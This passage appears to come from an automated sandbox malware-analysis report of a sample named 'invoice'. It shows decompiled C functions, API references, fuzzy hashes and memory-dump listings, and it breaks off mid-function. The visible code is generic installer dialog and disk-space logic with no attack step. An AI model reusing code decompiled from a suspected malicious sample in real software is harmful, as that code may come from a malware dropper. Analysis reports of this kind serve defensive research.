Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004031A9 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A9(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004031b7
0x004031bd

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404048 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404048(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42a86c, _a4); // executed
				return _t2;
			}

0x00404052
0x00404058

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E24), ref: 00404052

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D

Uniqueness

Uniqueness Score: -1.00%

Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
				return _t1;
			}

0x1000121d
0x10001223

APIs

GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404A09 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404A09(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				long _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				int _t194;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t277;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				int _t295;
				int _t296;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x42f448;
				_t282 = 0;
				_v24 =  *0x42f414 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42f41d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404957(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42f41c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42a854; // 0x0
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42a868; // 0x0
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42a854 = _t282;
								 *0x42a868 = _t282;
								 *0x42f480 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42f41d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E004049D7();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_t194 =  *0x42a868; // 0x0
									_v32 = _t194;
									_t195 =  *0x42f448;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42f44c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, "true");
										_t197 =  *0x42ebdc; // 0x67efe9
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404912(0x3ff, 0xfffffffb, E0040492A(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42f44c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42a868);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42f480 = _t306;
					 *0x42a868 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_t252 = LoadBitmapA( *0x42f400, 0x6e);
					 *0x42a85c =  *0x42a85c | 0xffffffff;
					_t313 = _t252;
					 *0x42a864 = SetWindowLongA(_v8, 0xfffffffc, E00405000);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a854 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a854);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F87(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404026(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404026(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
										_t295 =  *0x42a868; // 0x0
										 *(_t295 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_t296 =  *0x42a868; // 0x0
									_v32 = 1;
									 *(_t296 + _t316 * 4) = _t276;
									_t277 =  *0x42a868; // 0x0
									_t284 =  *(_t277 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42f44c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040405B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040405B(_v12);
								L91:
								return E0040408D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404a18
0x00404a29
0x00404a2e
0x00404a36
0x00404a3c
0x00404a44
0x00404a52
0x00404a55
0x00404c75
0x00404c7c
0x00404c90
0x00404c7e
0x00404c80
0x00404c83
0x00404c84
0x00404c8b
0x00404c8b
0x00404c9c
0x00404caa
0x00404cad
0x00404cc3
0x00404d38
0x00404d3b
0x00404d3d
0x00404d47
0x00404d55
0x00404d55
0x00404d57
0x00404d61
0x00404d67
0x00404d6a
0x00404d6d
0x00404d88
0x00404d6f
0x00404d79
0x00404d79
0x00404d6d
0x00404d61
0x00000000
0x00404d3b
0x00404cc8
0x00404cd3
0x00404cd8
0x00404cdf
0x00404ce4
0x00404ce8
0x00404cf3
0x00404cf3
0x00404cf7
0x00404cfb
0x00404cff
0x00404d12
0x00404d01
0x00404d01
0x00404d08
0x00404d0e
0x00404d0a
0x00404d0a
0x00404d0a
0x00404d08
0x00404d16
0x00404d18
0x00404d2b
0x00404d2e
0x00404d31
0x00404d31
0x00404cfb
0x00000000
0x00404ce8
0x00404cca
0x00404cd1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404d8b
0x00404d8b
0x00404d92
0x00404e03
0x00404e0b
0x00404e13
0x00404e13
0x00404e1c
0x00404e1e
0x00404e25
0x00404e28
0x00404e28
0x00404e2e
0x00404e35
0x00404e38
0x00404e38
0x00404e3e
0x00404e44
0x00404e4a
0x00404e4a
0x00404e57
0x00404fad
0x00404fb4
0x00404fd1
0x00404fd7
0x00404fe9
0x00404fe9
0x00000000
0x00404e5d
0x00404e5f
0x00404e64
0x00404e69
0x00404e6e
0x00404e70
0x00404e70
0x00404e71
0x00404e72
0x00404e74
0x00404e74
0x00404e7c
0x00404ebd
0x00404ebf
0x00404ec4
0x00404ecf
0x00404ed2
0x00404ed7
0x00404ede
0x00404ee1
0x00404f83
0x00404f89
0x00404f8f
0x00404f97
0x00404fa8
0x00404fa8
0x00000000
0x00404f97
0x00404ee7
0x00404eea
0x00404ef0
0x00404ef5
0x00404ef7
0x00404ef9
0x00404eff
0x00404f06
0x00404f0b
0x00404f12
0x00404f15
0x00404f15
0x00404f1c
0x00404f28
0x00404f2c
0x00404f2e
0x00404f2e
0x00404f1e
0x00404f20
0x00404f20
0x00404f4e
0x00404f5a
0x00404f69
0x00404f69
0x00404f6b
0x00404f6e
0x00404f77
0x00000000
0x00404e7e
0x00404e89
0x00404e8c
0x00404e91
0x00404e93
0x00404e97
0x00404ea7
0x00404eb1
0x00404eb3
0x00404eb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e99
0x00404e99
0x00404e9f
0x00404ea1
0x00404ea1
0x00404ea2
0x00404ea3
0x00000000
0x00404e99
0x00404e7c
0x00404e57
0x00404d9a
0x00000000
0x00404db0
0x00404dba
0x00404dbf
0x00000000
0x00000000
0x00404dd1
0x00404dd6
0x00404de2
0x00404de2
0x00404de4
0x00404df3
0x00404df5
0x00404df9
0x00404dfc
0x00000000
0x00404dfc
0x00404d9a
0x00404a5b
0x00404a60
0x00404a69
0x00404a70
0x00404a7e
0x00404a89
0x00404a8f
0x00404a9d
0x00404ab1
0x00404ab6
0x00404ac3
0x00404ac8
0x00404ade
0x00404aef
0x00404afc
0x00404afc
0x00404aff
0x00404b05
0x00404b07
0x00404b0a
0x00404b0f
0x00404b14
0x00404b16
0x00404b16
0x00404b36
0x00404b36
0x00404b38
0x00404b39
0x00404b3e
0x00404b41
0x00404b44
0x00404b48
0x00404b4d
0x00404b52
0x00404b56
0x00404b5b
0x00404b60
0x00404b62
0x00404b6a
0x00404c34
0x00404c47
0x00000000
0x00404b70
0x00404b73
0x00404b76
0x00404b79
0x00404b79
0x00404b7f
0x00404b85
0x00404b88
0x00404b8e
0x00404b8f
0x00404b94
0x00404b9d
0x00404ba4
0x00404ba7
0x00404baa
0x00404bad
0x00404be9
0x00404c0a
0x00404c0c
0x00404c12
0x00404beb
0x00404bf8
0x00404bf8
0x00404baf
0x00404bb2
0x00404bc1
0x00404bcb
0x00404bcd
0x00404bd3
0x00404bda
0x00404bdd
0x00404be2
0x00404be2
0x00404bad
0x00404c18
0x00404c19
0x00404c25
0x00404c25
0x00404c32
0x00404c4d
0x00404c51
0x00404c6e
0x00404c73
0x00000000
0x00404c53
0x00404c58
0x00404c61
0x00404feb
0x00404ffd
0x00404ffd
0x00404c51
0x00000000
0x00404c32
0x00404b6a

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A21
GetDlgItem.USER32(?,00000408), ref: 00404A2C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
LoadBitmapA.USER32(0000006E), ref: 00404A89
SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
DeleteObject.GDI32(00000000), ref: 00404AFF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
GetWindowLongA.USER32(?,000000F0), ref: 00404C39
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
ShowWindow.USER32(?,00000005), ref: 00404C58
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
ImageList_Destroy.COMCTL32(00000000), ref: 00404E28
GlobalFree.KERNEL32(00000000), ref: 00404E38
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
InvalidateRect.USER32(?,00000000,?), ref: 00404F89
ShowWindow.USER32(?,00000000), ref: 00404FD7
GetDlgItem.USER32(?,000003FE), ref: 00404FE2
ShowWindow.USER32(00000000), ref: 00404FE9

Strings

, xrefs: 00404FC1
M, xrefs: 00404BB2
g, xrefs: 00404F8F
N, xrefs: 00404C93

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$g
API String ID: 1638840714-2746997053
Opcode ID: 7e23995b76108e92cb9e54bee6c6a3cf5fdfe82eb0d160314d46ac34ca410947
Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
Opcode Fuzzy Hash: 7e23995b76108e92cb9e54bee6c6a3cf5fdfe82eb0d160314d46ac34ca410947
Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404496 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404496(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x42a048; // 0x67d2e4
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xa) + 0x430000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E00405665(0x3fb, _t146);
					E004061CF(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405665(0x3fb, _t146);
							if(E004059EB(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405F65(0x429840, _t146);
							_t87 = E004062FD("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405F65(0x429840, _t146);
								_t89 = E00405996(0x429840);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429840,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429840) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429840,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405944(0x429840);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429840) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E0040492A(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebdc; // 0x67efe9
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404912(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429830);
									} else {
										E0040484D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404048(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x42a860 - _t158; // 0x0
									if(_t205 == 0) {
										E004043EF();
									}
								}
								 *0x42a860 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a870;
							_v60 = E004047E7;
							_v56 = _t146;
							_v68 = E00405F87(_t146, 0x42a870, _t166, 0x429c48, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004058FD(_t146);
								_t125 =  *((intOrPtr*)( *0x42f414 + 0x11c));
								if( *((intOrPtr*)( *0x42f414 + 0x11c)) != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository") {
									E00405F87(_t146, 0x42a870, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3a0, 0x42a870) != 0) {
										lstrcatA(_t146, 0x42e3a0);
									}
								}
								 *0x42a860 =  *0x42a860 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
